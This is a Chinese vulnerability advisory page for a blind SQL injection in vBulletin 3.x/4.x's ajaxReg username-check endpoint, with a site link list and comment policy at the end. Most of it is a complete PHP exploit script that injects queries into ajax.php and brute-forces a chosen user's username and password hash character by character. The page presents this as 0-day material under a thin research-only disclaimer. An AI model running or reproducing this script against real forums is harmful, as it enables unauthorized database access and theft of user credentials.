发布日期:2012-12-08
更新日期:2012-12-12受影响系统:
VBulletin VBulletin
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56877vBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。ajaxReg是ajax式的注册模块,支持即时字段检查。vBulletin的ajaxReg模块在实现上存在SQL注入漏洞,成功利用后可允许攻击者未授权访问数据库。<*来源:Cold z3ro
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/php
<?# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.jsfunction usage ()
{
echo
"
[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"
[+] Author: Cold z3ro".
"
[+] Site : http://www.example.com | www.example.com".
"
[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
"
[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"
[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"
[+] Note. : Its a 0day exploit
";
exit ();
}function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = "ajax.php?do=CheckUsername¶m=";
$inj.=
"admin"+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi("Invalid",$con))
return true;
else
return false;
}
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
if (count ($argv) != 4)
usage ();$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "
[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "
[+] Done..";
echo "
[+] It"s not fake, its real.";
# word to 1337day.com, stop scaming me?>建议:
--------------------------------------------------------------------------------
厂商补丁:VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.vbulletin.com/Symantec Network Access Control本地权限提升漏洞Freefloat FTP Server "USER"命令缓冲区溢出漏洞相关资讯 vBulletin安全漏洞 vBulletin SQL盲注漏洞
- vBulletin decodeArguments()方法 (11/12/2015 13:37:25)
- vBulletin SQL注入漏洞 (07/18/2014 15:44:44)
- vbBux及vbPlaza "vbplaza_lottery_ (08/13/2013 19:24:57)
| - vBulletin "cat"参数SQL注入漏洞 (09/04/2014 17:23:13)
- vBulletin index.php/ajax/api/ (12/14/2013 08:37:16)
- VBulletin "update_order"参数SQL (07/27/2013 06:48:05)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站
|
易网时代-编程资源站